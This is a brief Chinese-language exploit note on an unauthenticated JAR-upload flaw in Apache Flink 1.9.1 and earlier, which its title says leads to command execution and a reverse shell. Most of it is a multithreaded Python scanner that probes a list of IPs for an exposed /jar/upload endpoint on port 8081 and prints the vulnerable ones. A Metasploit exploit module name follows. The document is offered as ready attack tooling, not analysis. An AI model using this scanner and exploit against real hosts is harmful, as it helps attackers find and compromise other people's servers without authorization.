Apache Flink 1.9.x 恶意JAR包上传,导致任意命令执行,反弹shell
版本:<= 1.9.1import os
import subprocess
import requests
from multiprocessing.dummy import Pool as ThreadPool
def get_iplist():
iplist = []
with open('iplist', 'r') as file:
data = file.readlines()
for item in data:
ip = item.strip()
iplist.append(ip)
return iplist
def poc(ip):
url = 'http://' + ip + ':8081/jar/upload'
try:
res = requests.get(url=url, timeout=2)
data = {
'msg': res.json(),
'state': 1,
'url': url,
'ip': ip
}
except:
data = {
'msg': 'Secure',
'state': 0,
'ip': ip
}
if data['state'] == 1:
print(data)
if __name__ == '__main__':
iplist = get_iplist()
pool = ThreadPool(50)
pool.map(poc, iplist)use exploit/multi/http/apache_flink_jar_upload_exec